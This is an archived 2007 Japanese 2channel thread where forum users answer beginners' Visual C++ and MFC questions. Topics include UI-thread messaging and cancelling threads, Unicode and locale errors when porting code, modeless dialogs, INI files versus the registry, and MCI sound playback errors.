2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★初心者にVisual C++を教えるスレ★ Part25

1 :デフォルトの名無しさん:2007/01/10(水) 00:00:39
1 : ◆Manna2uCLg :2005/04/15(金) 13:33:14
Visual C++入門者・初心者からの質問を、
お兄ちゃん達が優しく、時には厳しく回答してくれるスレッドです。

■質問するにあたって
・エラーや警告のときはエラーメッセージを書きましょう。
・開発環境も書きましょう。
・できるだけ具体的に。

質問の仕方については次のページが大変参考になります。
http://www.hyuki.com/writing/techask.html
http://myu.daa.jp/osiete/

■回答するにあたって
・回答する場合はその答えに至るための「コツ」も書いてあげると良いでしょう。
 (MSDNのどの項目だとか、何のキーワードでGoogleするとか)
・ネタや煽りは軽く流しましょう。

過去スレ、関連スレなどは>>2-5


2 :デフォルトの名無しさん:2007/01/10(水) 00:01:18
Part24 ttp://pc10.2ch.net/test/read.cgi/tech/1158296664/
Part23 ttp://pc8.2ch.net/test/read.cgi/tech/1140711893/
Part22 ttp://pc8.2ch.net/test/read.cgi/tech/1131443284/
Part21 ttp://pc8.2ch.net/test/read.cgi/tech/1124806288/
Part20 ttp://pc8.2ch.net/test/read.cgi/tech/1120222322/
Part19 ttp://pc8.2ch.net/test/read.cgi/tech/1116209988/
Part18 ttp://pc8.2ch.net/test/read.cgi/tech/1113539594/
Part17 ttp://pc8.2ch.net/test/read.cgi/tech/1107926989/
Part16 ttp://pc8.2ch.net/test/read.cgi/tech/1101022051/
Part15 ttp://pc5.2ch.net/test/read.cgi/tech/1097880265/
Part14 ttp://pc5.2ch.net/test/read.cgi/tech/1093672937/
Part13 ttp://pc5.2ch.net/test/read.cgi/tech/1089011118/
Part12 ttp://pc5.2ch.net/test/read.cgi/tech/1083585833/
Part11 ttp://pc5.2ch.net/test/read.cgi/tech/1077965179/
Part10 ttp://pc5.2ch.net/test/read.cgi/tech/1074933908/ ※
Part09 ttp://pc5.2ch.net/test/read.cgi/tech/1068983609/ ※
Part08 ttp://pc5.2ch.net/tech/kako/1063/10630/1063029371.html
Part07 ttp://pc5.2ch.net/tech/kako/1056/10562/1056280510.html
Part06 ttp://pc5.2ch.net/tech/kako/1052/10529/1052931903.html
Part05 ttp://pc5.2ch.net/tech/kako/1048/10486/1048698321.html
Part04 ttp://pc5.2ch.net/tech/kako/1044/10441/1044196393.html
Part03 ttp://pc5.2ch.net/tech/kako/1038/10381/1038160750.html
Part02 ttp://pc3.2ch.net/tech/kako/1030/10309/1030985362.html
Part01 ttp://pc3.2ch.net/tech/kako/1023/10235/1023530449.html


3 :デフォルトの名無しさん:2007/01/10(水) 00:04:52
【関連スレ】
■MFC相談室 mfc17d.dll■
http://pc10.2ch.net/test/read.cgi/tech/1164073111/l50
Win32API質問箱 Build48
http://pc10.2ch.net/test/read.cgi/tech/1166172047/l50
鬱だ氏のう DirectX (Part 16)
http://pc8.2ch.net/test/read.cgi/tech/1133007002/l50
【ISO/ANSI/JIS】 C言語なら俺に聞け! Part 130
http://pc10.2ch.net/test/read.cgi/tech/1159613789/l50
C++相談室 part55
http://pc10.2ch.net/test/read.cgi/tech/1164951094/l50
C/C++の宿題を片付けます 80代目
http://pc10.2ch.net/test/read.cgi/tech/1166969820/l50
【初心者歓迎】C/C++室 Ver.33【環境依存OK】
http://pc10.2ch.net/test/read.cgi/tech/1164376287/l50

【関連サイト】
猫でもわかるプログラミング
http://www.kumei.ne.jp/c_lang/
MSDN ライブラリ ※変更された
http://msdn.microsoft.com/library/ja/
http://msdn2.microsoft.com/ja-jp/library/ (2005のことはこっち)
Platform SDK Update ※変更された
http://www.microsoft.com/downloads/details.aspx?FamilyId=A55B6B43-E24F-4EA3-A93E-40C0EC4F68E5&displaylang=en
Google
http://www.google.co.jp/


4 :デフォルトの名無しさん:2007/01/10(水) 00:05:23
【このスレの前身 VisualC++相談室 過去スレ】
part 1 ttp://piza.2ch.net/tech/kako/970/970607517.html
part 2 ttp://piza.2ch.net/tech/kako/981/981630730.html
part 3 ttp://piza2.2ch.net/tech/kako/993/993186053.html
part 4 ttp://pc.2ch.net/tech/kako/1002/10021/1002165477.html
part 5 ttp://pc.2ch.net/tech/kako/1006/10068/1006834463.html
part 6 ttp://pc.2ch.net/tech/kako/1011/10116/1011615035.html
part 7 ttp://pc.2ch.net/tech/kako/1017/10178/1017843192.html
part 8 ttp://pc.2ch.net/tech/kako/1022/10224/1022499000.html
part 9 ttp://pc5.2ch.net/tech/kako/1036/10368/1036897197.html

5 :デフォルトの名無しさん:2007/01/10(水) 00:40:00
>>1

6 :デフォルトの名無しさん:2007/01/10(水) 07:53:59
【ネガティブ派遣根性チェック】

3つ以上、思い当たる点があればアナタの性格はひん曲がっており、ネガティブ負け組人生を歩んでいます。

□派遣先の社員の意見にはたとえ間違っていても反対しない
□派遣先から「いつまでもここで仕事してくださいね」と言われるようになりたい
□自社に仕事を持ち帰れるように言われるとムカつく
□自社で仕事なんてできるわけがない
□派遣/受託の差異を指摘する人間はムカつく
□派遣先には仕事だけでなく自分のプライベートについても指示して欲しい
□自分の月額金額を知らない
□派遣先社員より自分の生涯収入が低いのは当然だ
□派遣先に尻尾を振り、いつまでも一緒に仕事をすることが大切だ
□今のプロジェクトが終わっても同じ派遣先に常駐したい


7 :デフォルトの名無しさん:2007/01/10(水) 15:13:31
UIスレッドについての質問です
メインから子スレッドにメッセージを飛ばしたいのですがうまくいきません
PostThreadMessageを使い第一引数にはスレッドのm_nThreadIDを渡しています

子スレッド側のソースにはON_THREAD_MESSAGEを使って配置しています

しかしメッセージがきている様子はありませんPostThreadMessageじゃないのでしょうか?
コンパイラはエラーをだしていませんでした

8 :デフォルトの名無しさん:2007/01/10(水) 15:25:58
メッセージがきている様子が無いのは何で確認したの。
メッセージループの中?

9 ::2007/01/10(水) 15:28:06
MFCなのでメッセージマップに対応した関数のところに
ブレークポイントをつけていたのですが反応がありませんでした

10 :デフォルトの名無しさん:2007/01/10(水) 16:09:57
試しにPreTranslateMessageを通過してるかみてみて

11 :デフォルトの名無しさん:2007/01/10(水) 16:10:06
とりあえずPostThreadMessageの戻り値を確認

12 ::2007/01/10(水) 16:22:33
PreTranslateMessageを子スレッドにオーバーライドしたんですが
PostThreadMessageのあとに通過していませんでした

13 ::2007/01/10(水) 16:52:51
virtual BOOL PreTranslateMessage(MSG *pMsg){return 1;}

子スレッドのヘッダファイルに追加したのはこれですが間違ってますか?

14 :デフォルトの名無しさん:2007/01/10(水) 16:58:16
んー、、、そうなるとPostが失敗しているか、Post先が違うかじゃないのかな

15 ::2007/01/10(水) 17:03:49
PostThreadMessageの返り値は1でした
post先は子スレッドのメンバ変数のm_nThreadIDで指定するんじゃないんですか?

16 :デフォルトの名無しさん:2007/01/10(水) 17:12:03
俺も初心者だけど、
PreTranslateMessageは自分で処理した時(普通に処理されたくない時)にTRUEを返すんじゃないの?
必ずreturn 1じゃ全てのメッセージを握り潰しちゃうんじゃないかな。

17 ::2007/01/10(水) 17:17:50
オーバーライドしても通過しなかったのでreturn 1も通ってないことになります

18 :デフォルトの名無しさん:2007/01/10(水) 17:22:47
子スレッド側でモーダルダイアログ出してるとか

19 ::2007/01/10(水) 17:29:49
子スレッドでダイアログ等の表示はやっていません

20 :デフォルトの名無しさん:2007/01/10(水) 17:32:02
メッセージキューそのものはあるんだよね?
Sleep入れながらしつこく何回か送ってみても反応なし?

21 :デフォルトの名無しさん:2007/01/10(水) 17:32:12
子スレッドのメッセージループはちゃんと回ってるのか?

22 ::2007/01/10(水) 17:40:25
子スレッドのメッセージマップはこんな感じでううでしょうか?

BEGIN_MESSAGE_MAP(CWinThreadの派生クラス名, CWinThread)
ON_THREAD_MESSAGE(ユーザー定義のメッセージ,割り当てる関数名)
END_MESSAGE_MAP()

スリープをいれながらやってみましたが無反応でした
メッセージキューやメッセージループはマップに追加だけでは駄目なのでしょうか?

23 ::2007/01/10(水) 18:07:32
子スレッド(TestThread)のヘッダファイル
afx_msg void TestMssage(UINT afg, LONG aty);

子スレッド(TestThread)のソースファイル

BEGIN_MESSAGE_MAP(TestThread, CWinThread)
ON_THREAD_MESSAGE(WM_TEST,TestMssage)
END_MESSAGE_MAP()
.
.
.
void TestThread::TestMssage(UINT afg, LONG aty){}


メインソースファイル
TestThread Testes;
.
.
.
PostThreadMessage(Testes.m_nThreadID,WM_TEST,1,1);

指摘お願いします


24 :デフォルトの名無しさん:2007/01/10(水) 18:10:04
子スレッドのメッセージループはちゃんと回ってるのか?

25 ::2007/01/10(水) 18:12:42
スレッドメッセージループはRunの中なのですか?
子スレッドはInitInstance()内で処理をし続けているので
メッセージループがRunにあるとすれば回っていないと思います

26 ::2007/01/10(水) 18:23:30
InitInstanceの処理中に他の処理を割り込ませることは無理なのですか?

27 :デフォルトの名無しさん:2007/01/10(水) 18:34:58
UIスレッドなんだろ、なんでそんなことしてるんだ

28 ::2007/01/10(水) 18:43:49
UIスレッドでの処理中にユーザ側からポチっとなっと
スレッドのリスタートやら破棄やらいろいろしたいのです

つまり処理中に割り込んでまた初めからすぐにスタートのような感じです
フラグ変数を立てるやり方だとどこでそれがくるかわからないし反映も遅いし
ソースがフラグだらけになってしまうと思います

29 :デフォルトの名無しさん:2007/01/10(水) 18:46:27
メッセージポンプはRun()の中。
InitInstance()で処理し続けちゃダメ。
初期化だけしてすぐ終われ。

30 ::2007/01/10(水) 18:51:13
>>29
そうするとRunをオーバーライドしてそこに処理を書くということでしょうか?
うーんでもRunの中はメッセージを待つのでまずいような
でもそうなると処理中は割り込めないような・・・
どうすればいいのでしょうか?

31 :デフォルトの名無しさん:2007/01/10(水) 18:59:25
VisualC++6.0の入門書を読み始めました。
時代の流れに乗り遅れないためにと、始めたのですが、
VisualC++はどういうアプリケーションで使われているのでしょうか?

32 :デフォルトの名無しさん:2007/01/10(水) 20:00:33
入門書から既に時代遅れな件について

33 :デフォルトの名無しさん:2007/01/10(水) 20:00:37
>>30
UIを扱うスレッドで長い時間がかかる処理をする、ということ自体がダメ。
だから「UIだけを扱うスレッドを走らせよう」って発想が出て「UIスレッド」って呼ばれるのよ。

処理に割り込みなんて、自分で書かないとできない。
(TerminateProcessやTerminateThreadはDLL絡みとかで問題がある)
長い時間がかかる処理を中断させたいなら、その処理内で中断フラグをちょくちょく見るしかない。

34 :デフォルトの名無しさん:2007/01/11(木) 01:33:23
先スレの992ですが
外人さんの作った、VC6のプログラムを、VC8に移植しているのですが日本語表示が上手く出来ません、
>>996の手ほどきで
1.プロジェクトのプロパティでリソースのカルチャを日本語にする
2.リソースビューでIDD_ABOUTBOXをシングルクリックしプロパティのLanguageを日本語
3.リソースビューでIDD_ABOUTBOXをダブルクリックしFontを日本語Fontに変更
間でしたのですが
4.ダイアログに適当に日本語を設定しビルドと、
>>あとPG内で_tsetlocaleはしておいたほうが無難。
とアドバイスしてくれてたのですが
_tsetlocaleで検索すると
_tsetlocale(LC_ALL,_T(""));に設定しなさいとか出てきたのですが、これってMFCの場合ですよね?

35 :デフォルトの名無しさん:2007/01/11(木) 01:41:56
補足します、現在の文字コードはマルチバイトに設定しています、
コンパイラの設定を上記の変更をしたおかげで、リストビューのタイトルメニュー等は
日本語表示が出来るようになったのですが
日本語データを読込んで表示する部分で変換が出来ていません(文字化けします)
なるべく手間を掛けずに日本語表示できる方法があれば教えてください。


36 :デフォルトの名無しさん:2007/01/11(木) 01:47:21
>>34
いいえ、_tsetlocaleはMFCのものではありません。Cランタイムの関数です。

37 :デフォルトの名無しさん:2007/01/11(木) 01:54:27
>>36
そうですか、_tsetlocaleを使う場合何か特別なヘッダーファイルを
インストールしないとだめなのでしょうか?
_tsetlocale(LC_ALL,_T(""));こう記述すると
error C2065: 'LC_ALL' : 定義されていない識別子です。
error C3861: '_T': 識別子が見つかりませんでした
error C4430: 型指定子がありません - int と仮定しました。メモ: C++ は int を既定値としてサポートしていません
となるのですが?


38 :デフォルトの名無しさん:2007/01/11(木) 02:07:14
>>37
#include <locale.h>です。MSDNぐらいは見ましょう。

>日本語データを読込んで表示する部分で変換が出来ていません
読み込んだデータじゃなく固定で "てきとう" を表示しようとしたら表示できます?

39 :デフォルトの名無しさん:2007/01/11(木) 02:07:14
>>37
msdn 読んでくれ。

40 :デフォルトの名無しさん:2007/01/11(木) 02:14:12
すみません、良く調べますそれから報告ですが
現在64個のエラーが出ているのですが、エラーのリストを秀丸に貼り付けて正規表現の置換を使って分析したら。
: error C2664: 'lstrcpyW' : 1 番目の引数を 'char [100]' から 'LPWSTR' に変換できません。
             : 1 番目の引数を 'char [100]' から 'LPCWSTR' に変換できません。
: error C2440: '=' : 'const char [1]' から 'LPWSTR' に変換できません。
の2種類だけですが解決の糸がかりになりませんでしょうか?


41 :デフォルトの名無しさん:2007/01/11(木) 02:16:06
>>40
35で言ってる >補足します、現在の文字コードはマルチバイトに設定しています
があやしい。'lstrcpyW'はUNICODE用。

42 :デフォルトの名無しさん:2007/01/11(木) 02:24:22
なんども、すみません
35の時点ではマルチバイトでしたが日本語変換できないので
_tsetlocale(LC_ALL,_T(""));を使うにために現在はUNICODEに設定しています


43 :デフォルトの名無しさん:2007/01/11(木) 04:22:03
> _tsetlocale(LC_ALL,_T(""));を使うにために現在はUNICODEに設定しています 
悪いけど、お前さんに今の作業を完了させる事は難しい気がする。

LPCWSTR とか _T() とか、調べるべきキーワード沢山あるじゃん。

44 :デフォルトの名無しさん:2007/01/11(木) 07:31:01
_tsetlocale使うのにUNICODEを設定する必要は無いと思うが。

45 ::2007/01/11(木) 10:06:05
>>33
マルチスレッドで長く複雑な処理は難しいということですか

フラグをちょくちょく見るにはソースのなかにちょくちょく
チェックするためのif文等をいれていくしかないのでしょうか?

そうするぐらいならタイマ割り込みのようなもので
スレッド側で定期的に監視させたいのですが
UIスレッドの処理中に子スレッド側で
タイマ割り込みのようなことはできるのでしょうか?

46 :デフォルトの名無しさん:2007/01/11(木) 10:19:16
>>45
ワーカースレッドにしとけ

47 ::2007/01/11(木) 10:26:21
ワーカースレッドだと複雑な処理は難しいでしょう
JAVAなら割り込みメソッドがちゃんと用意されてるみたいです
http://www.javaworld.jp/technology_and_programming/-/10795-5.html

48 :デフォルトの名無しさん:2007/01/11(木) 10:34:04
InitInstance内で済まそうとしてるってことは単純な処理としか思えんが・・・

49 :デフォルトの名無しさん:2007/01/11(木) 10:37:28
>>47 の内容みたけど、その程度ならEvent使えば同じことできるじゃん

50 ::2007/01/11(木) 10:38:56
今のところUIスレッドから派生したクラスの中で作った
メンバ関数をInitInstance内の中で呼び出すしかないと思ってやってるんですが
初心者なので他になにか良い方法があれば教えてください

51 ::2007/01/11(木) 10:43:23
Eventは使ったことがないのですが調べてみます
参考ページがあれば教えてもらえたらうれしいです

52 :デフォルトの名無しさん:2007/01/11(木) 10:49:13
つまり、ユーザーインターフェースは入力も出力も必要ない
割り込みは必要ってことでいいのかな

53 ::2007/01/11(木) 10:53:17
はい

子スレッドの状態を見るのはメイン側にメッセージを飛ばして解決しています

54 :デフォルトの名無しさん:2007/01/11(木) 11:16:02
単純な処理を複雑にやりたいということか

55 ::2007/01/11(木) 11:19:17
クラスで実装しないと厳しいので単純でもないです

56 ::2007/01/11(木) 11:23:34
初期化はコンストラクタ内でやっています
InitInstanceかRunいがいに処理を置ける場所がないように見えます
処理はし続けているので単純と言われれば単純ですね

メッセージを待って処理をするタイプではないです

57 :デフォルトの名無しさん:2007/01/11(木) 11:38:24
Javaの例も割り込みは自分でチェックするか例外が発生するしかないようだし
イベントの発生をチェックしては。
Sleepが絡むときはSleepのスレッド作ってそこからイベント、かなあ
最近のMFC知らんけどもっといい方法あるのかな

58 :デフォルトの名無しさん:2007/01/11(木) 11:51:18
.NETのSystem.Threading.Threadを派生する感じで実装するといい。
これでスレッドとクラスが一対一になって扱いやすくなる、といいな。

MFC使ってるみたいだから、
メンバにCWinThreadのポインタと中断用のCEventを用意して、
StartでAfxBeginThreadでタスクメンバ関数を起動、
ただし、CREATE_SUSPENDEDで起動 - CWinThread.m_bAutoDelete=FALSE
- CWinThread.ResumeThread() の手順を踏んでおく。
タスクメンバ関数は中断用CEventを適時監視しつつ処理を実行する。
AbortではCEvent.SetEvent()。
JoinはWaitForSingleObjectをINFINITEで、
IsAliveはWaitForSingleObjectをウェイト0で呼び出す。
ちなみに、CWinThreadポインタの破棄は、
もう一度スレッドを起動しなおす時か、デストラクタの時だけにした方が色々楽。

中断するときは、Abort->Join呼び出しでスレッド停止待ち。
自然に完了を待つには、SetTimerのハンドラでIsAlive見て確認、ってのが一番楽。

59 :デフォルトの名無しさん:2007/01/11(木) 12:20:44
何この馬鹿?
教えるだけ無駄だろ

> 25 名前:7[] 投稿日:2007/01/10(水) 18:12:42
> スレッドメッセージループはRunの中なのですか?
> 子スレッドはInitInstance()内で処理をし続けているので
> メッセージループがRunにあるとすれば回っていないと思います
>
> 26 名前:7[] 投稿日:2007/01/10(水) 18:23:30
> InitInstanceの処理中に他の処理を割り込ませることは無理なのですか?

60 ::2007/01/11(木) 12:22:41
MFCで.NETのクラスを派生ですか
どうやればできるのかわかりません
クラスの追加ウィザードからできるのでしょうか?
環境はVC++7.0です

61 ::2007/01/11(木) 12:24:50
>>59
すいません初心者なもので
あとそれは引用だけでまったく答えになっていませんよね

62 :デフォルトの名無しさん:2007/01/11(木) 12:30:13
馬鹿を晒しものにしてやってるだけだから気にしなくていいよ

63 ::2007/01/11(木) 12:32:43
>>61
そうですか初心者を教えるスレで初心者相手に
馬鹿にして猿山大将気取りのなにが楽しいのか
わかりませんが気にしないことにします

64 ::2007/01/11(木) 12:33:33
>>62さんでした^^;

65 :デフォルトの名無しさん:2007/01/11(木) 12:40:12
初心者ならともかく馬鹿に教えることは不可能

66 ::2007/01/11(木) 12:52:20
>>65
>>25>>26の時点では
InitInstanceの処理中に割り込みをするにはメッセージを使うのかもしれないと
思っていたのでRun関数は通っていないのでメッセージ待ちは他の場所がるのかと
勘違いしていました

この時点での初心者と馬鹿の違いを教えてもらいたいところですが
それはまたスレ違いだと思いますので
馬鹿ですいませんがVC++を教えてもらえないでしょうか?^^;

67 :デフォルトの名無しさん:2007/01/11(木) 12:56:56
割り込みって書いてる時点で、Windowsアプリの知識が根本的に足りないと感じた。

68 :デフォルトの名無しさん:2007/01/11(木) 12:57:11
便乗質問ですが
ワーカースレッドでは実現困難で、UIスレッドを使うべきケースが思い浮かびません。
いくつかサンプルを拾って見てみたのですが、サンプルを書くために必然性なしにUIスレッドに
しているとしか思えないようなモノばかりでした。

CWinApp以外ではどういう時に使ってます?

69 :デフォルトの名無しさん:2007/01/11(木) 12:57:52
一つ聞かせて頂きたいんですけど、C++はCの上位互換ですけど
C++が出来てCが出来ない人って居るんでしょうか?

70 :デフォルトの名無しさん:2007/01/11(木) 13:02:29
そうでもない

71 ::2007/01/11(木) 13:02:53
>>67
子スレッドの処理中にメイン側の合図で他の処理をすることが目的なので
割り込みと表現したのですが^^;

72 :デフォルトの名無しさん:2007/01/11(木) 13:04:48
>>69
STLとboostが使えないと何も出来ない、という人はいるかも。

73 :デフォルトの名無しさん:2007/01/11(木) 13:08:34
>>71
Windowsではそういうことはできない。
メッセージでも、明示的/暗黙的にメッセージを処理できる状態にしてやらないと処理できない。

74 :デフォルトの名無しさん:2007/01/11(木) 13:13:38
スレッドと言いながら関数に割り込みかけてる。

75 ::2007/01/11(木) 13:19:41
>>73
できないとなるとフラグメンバ変数かシグナル状態を変えて
ソース内で定期的にif文を記述しでチェックするしかないのでしょうか
そうなると>>58さんの方法がまだ理解できてないんですが
同じような方法ということでしょうか?

76 :デフォルトの名無しさん:2007/01/11(木) 13:22:22
関数の中のループに割り込みかけたいらしい。

77 :デフォルトの名無しさん:2007/01/11(木) 13:24:58
winnyはC++で書かれていますが、winMXもC++で書かれているのですか?

78 :デフォルトの名無しさん:2007/01/11(木) 13:37:41
>>75
フラグ変数がCEventオブジェクトになっただけ

79 :デフォルトの名無しさん:2007/01/11(木) 13:45:15
>>75
普通、重たい処理はループしてるから遅いわけで、ループ一回りに掛かる時間は
ごくわずか。そのループ中に1行eventの状態チェック入れるだけ。
ループしてないのに重いとか、ループ一回りが遅いというなら75の言うとおりになるかも。

80 :77:2007/01/11(木) 16:10:41
誰か知りませんでしょうか?

81 :デフォルトの名無しさん:2007/01/11(木) 16:34:28
VisualStudio2003を使用してMFCでモードレスダイアログを実装しようとしています。

http://support.microsoft.com/kb/403848/ja

こちらのページを見て、そのとおりに記述しているのですが、コンストラクタ内の
Create文を通ってもダイアログが表示されません。OSはWinXPです。
問題がわかる方、またはその他の良い方法を知っている方がいましたらよろしくお願いします。



82 :デフォルトの名無しさん:2007/01/11(木) 16:37:50
>>81
ダイアログのID はIDDですか?

83 :82:2007/01/11(木) 16:49:15
>>81
ごめん、ちょっとやってみた。
ダイアログのプロパティでVisible をtrueにするか
new したあとで ShowWindow(SW_NORMAL) 呼んでみな

84 :デフォルトの名無しさん:2007/01/11(木) 18:47:13
MFC使うなら2005Expressじゃダメですか?VC8.0あたり買ってこないとダメ?

後これといった質問はないのですが、
此処での初心者ってのはどこまでが初心者なんですか?

85 :デフォルトの名無しさん:2007/01/11(木) 19:24:55
>>81
特に問題なくダイアログ表示できた

86 :81:2007/01/11(木) 19:29:46
>>82
IDDでした

また、Visibleにしたところ、ちゃんと表示されるようになりました。
(今までのは作成だけされて見えていなかったということでしょうか?
タスクを見ているとメモリ使用量だけはCreateした分だけ増えていたので・・・)
ありがとうございました!

87 :デフォルトの名無しさん:2007/01/11(木) 21:30:29
まあそうみたいだな。
モードレスダイアログは作りっぱなしでSHOW、HIDEするケースが多いから
ShowWindow()も試しておいたほうがいいと思うよ。

88 :デフォルトの名無しさん:2007/01/11(木) 22:06:09
プログラム関連ではないのですが、質問です。
resource.hのファイル名を変更してTestResource.hとしました。
以降このファイルにリソースのdefine値を連動させておくため、
リソースファイルのincludeをresource.hからTestResource.hに変更した
まではよかったのですが、リソース変更後に保存するとなぜかinclude
先がresource.hに戻ってしまいます。これはどうしてなんでしょうか?
解決法を知っている方いましたらお教えください。お願いします。

89 :デフォルトの名無しさん:2007/01/11(木) 22:10:17
変えるとなんかいいことあるの?

90 :デフォルトの名無しさん:2007/01/11(木) 22:13:38
>>88
リソースビューで、xx.rcを右クリックしてインクルードファイルの設定替えればいい
つーか、ヘルプに書いてあると思うが

91 :デフォルトの名無しさん:2007/01/11(木) 22:25:06
>>84
Express Edition には MFC はついてこないので
パッケージ版を購入してくるべし。

92 :デフォルトの名無しさん:2007/01/11(木) 22:34:15
>90
できました、ありがとうございます。

93 :デフォルトの名無しさん:2007/01/11(木) 22:36:49
>>91本当ですか。。。。所持金ヤバイのにorz2万とかムリス
アカデミはなんか無理そうだし・・・

94 :デフォルトの名無しさん:2007/01/11(木) 22:55:38
>7にはこのコードをあげる。よい子は使っちゃダメだぞ。
typedef void (*throwFuncType)();
void dothrow_func(){ throw 300;}
DWORD CALLBACK threadproc( void * ){
printf("BeginThread\n");
int i=0;
try{
while(1) { i++; }
}catch( int ){
printf("\n%d: catched exception.\n",i);
}
return 0;
}
int main(){
throwFuncType dothrow_ptr = dothrow_func;
DWORD id; HANDLE hThread = CreateThread(NULL,0,threadproc,NULL,0,&id);

char t[255]; fgets(t,200,stdin);

CONTEXT context; context.ContextFlags = CONTEXT_CONTROL;
SuspendThread( hThread); GetThreadContext(hThread, &context);
context.Eip = (DWORD)dothrow_ptr;
SetThreadContext(hThread, &context); ResumeThread( hThread);
WaitForSingleObject(hThread,INFINITE);
}

95 :デフォルトの名無しさん:2007/01/11(木) 23:10:33
>>93
アカデミックはスタンダード相当でMFCもきちんとあるはずだぞ。

96 :デフォルトの名無しさん:2007/01/11(木) 23:28:20
>>94
こんな手があったのか。面白いけどちょっと怖いな。

97 :デフォルトの名無しさん:2007/01/11(木) 23:34:16
>>95
学生じゃ無くて無理そうなのでは

98 :デフォルトの名無しさん:2007/01/12(金) 13:33:06
MFCのデータベースプログラミングをしようとして
ODBCを使ってみたんですがテーブルごとにクラスが作られてしまいますが
いろいろなテーブルを取得したい場合はどうすればいいのでしょうか?

99 :デフォルトの名無しさん:2007/01/12(金) 15:25:55
>>98
自分で直接CDatabaseやらCRecordsetやらをいじくればいいが、
今時ならせめてADOかOLEDBを使うのを薦める。

100 :デフォルトの名無しさん:2007/01/12(金) 16:16:14
環境 VC++7.0 Windows2000

保存と取り出しができているので成功しているはずなんですが
INIファイルで保存と取り出しはできたのですが保存先がわかりません
プロジェクト名.INIで保存されてるはずのファイルがみつかりません
ファイルの検索でもひっかかりません
Windows2000だとどこか特別な場所に保存されるのでしょうか?
m_pszProfileNameもデバッグ時に確かめましたがプロジェクト名でした


ソース
m_iData1 = 20;
m_sString1 = "mojiretsu";
……

// INIファイルに情報を保存する
CWinApp* pApp = AfxGetApp();
pApp->WriteProfileInt("ProgramData", "IntData1", m_iData1);
pApp->WriteProfileString("ProgramData", "String1", m_sString1);






// INIファイルから情報を取り込む
CWinApp* pApp = AfxGetApp();
m_iData = pApp->GetProfileInt("ProgramData", "IntData1", 0);
m_sString1 = pApp->GetProfileString("ProgramData", "String1", NULL);


101 :デフォルトの名無しさん:2007/01/12(金) 16:23:00
プロジェクト名.INI に保存されるというのはどこに書いてあった?

まあ2000ならwin.ini でもなくてレジストリにマッピングされてると思うけど。

102 :デフォルトの名無しさん:2007/01/12(金) 16:23:02
レジストリ?

103 :デフォルトの名無しさん:2007/01/12(金) 16:25:26
>>101

ここです
http://www.alpha-net.ne.jp/users2/uk413/vc/VCT_INI.html

104 :100:2007/01/12(金) 16:34:41
レジストリエディタから検索かけたら
プロジェクト名.iniがありましたが

これ直接編集できるんですか?

105 :デフォルトの名無しさん:2007/01/12(金) 16:35:22
ええと、VC++の7.0って.NETの年数無しバージョンだっけ?
ちょっとMFCのバージョンわからんが、

InitInstance() に、SetRegistryKey(_T("アプリのキー")) というのが無いかな?
そこで指定した文字列をキーに、

\\HKEY_CURRENT_USER\Software\アプリのキー\ProgramData\IntData1 に データが入って無いか?
レジストリはスタートメニューからファイル名を指定して実行を選んで regedit と入れれば
レジストリエディタが起動する。

106 :デフォルトの名無しさん:2007/01/12(金) 16:42:40
もう一つ前のバージョンだったか。
NTの時から、INIファイルをレジストリにマッピングする機能があって
INIファイルに書いてもレジストリに書き込まれる仕組みがOSにあった。
その場合は
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
以下にできる

MFCはそれを使わずにレジストリに切り替える機能もある。
SetRegistryKey()がそれ
任意のファイルにしたければ、APIのWritePrivateProfile・・・ を使えばいいかな。

107 :100:2007/01/12(金) 16:48:02
>>105
.NETの年数無しバージョンです

ありがとうございますありました

これはレジストリエディタを使わないと編集できないということなのでしょうか?



108 :100:2007/01/12(金) 16:55:21
INIファイルをレジストリにマッピングする機能ですか・・・
INIファイルを普通に編集したいならWritePrivateProfileで保存しなければ
いけないんですね

ということはそれも指定してINIファイルを読み込みにいかないといけないのか

109 :デフォルトの名無しさん:2007/01/12(金) 16:58:28
どうしてもファイルにしたければ、SetRegistryKey()を呼ばないで
Private の付いたAPIを呼ぶしかないかなあ、、、
でもこれ16bitWinの互換性に残ってるだけだしな。

110 :デフォルトの名無しさん:2007/01/12(金) 17:11:02
MFCのiniのパスはm_pszProfileName

111 :100:2007/01/12(金) 17:18:34
これだとレジストリでやったほうが簡単そうですね
ありがとうございました

112 :デフォルトの名無しさん:2007/01/12(金) 17:34:12
MFCはレジストリもiniもどっちも同じ方法だし
レジストリとiniの切り替えも簡単

113 :デフォルトの名無しさん:2007/01/12(金) 17:49:50
iniの場合フルパスを意識しないとならんけどな

114 :100:2007/01/13(土) 14:32:27
m_pszProfileNameのパス変えて
他のにも書き込んだり読み込んだりできました

でもパス名変えるとアプリケーション終了時にOSがエラーだしてきます


115 :デフォルトの名無しさん:2007/01/13(土) 14:46:11
MSDN読め

116 :100:2007/01/13(土) 14:57:46
わかりました

117 :デフォルトの名無しさん:2007/01/13(土) 15:44:35
VC++.NET Standard (VC++7.0)使用です

mciコマンドで音を鳴らしていたのですが、音を鳴らす時に1秒くらい固まるのでマルチスレッドにしようとAfxBeginThreadにそこらへんの処理をぶち込みました。
するとmciSendCommandにて303エラーが発生。
おそらくスレッドから呼び出したから安全性がどうのこうのといった内容だと思うのですが
これを回避するにはどのようにすれば良いのでしょうか?

118 :デフォルトの名無しさん:2007/01/13(土) 15:56:12
シングルスレッドだってスレッドから呼び出してることに変わりは無いけどな
303って、MCIERR_ILLEGAL_FOR_AUTO_OPEN?
メインスレッドで自動オープンしたデバイスを別スレッドから触ろうとした?

119 :デフォルトの名無しさん:2007/01/13(土) 16:38:36
エラーメッセージは「指定されたコマンドを自動的に開かれたデバイスで実行することはできません」です
メインスレッドで自動オープンしたうんぬんというのが何を指しているのかは分かりませんが
少なくともmciなんたらの命令は作成したマルチスレッド内でしか使っていません
どうやらwindowメッセージ(MM_MCINOTIFY)の受け取りを親スレッドでしているのが原因らしいです

AfxBeginThreadの中でメッセージ(MM_MCINOTIFY)の受信ってできるのでしょうか?
それとも別の方法でスレッドを作るのかな?CWinThreadとか使った事が無いけど可能ですか?

120 :デフォルトの名無しさん:2007/01/13(土) 16:56:57
すみません捕捉しておきます

mop.dwCallback = (DWORD)pDoc->GetSafeHwnd();
mop.lpstrDeviceType=DeviceType[pDoc->BGMNum];
mop.lpstrElementName=midiFile;


mciErr = mciSendCommand(NULL,MCI_OPEN, MCI_NOTIFY | MCI_OPEN_TYPE | MCI_OPEN_ELEMENT,(DWORD_PTR)&mop);
mpp.dwCallback = (DWORD)pDoc->GetSafeHwnd();

スレッドの中を抜粋するとこんな感じです
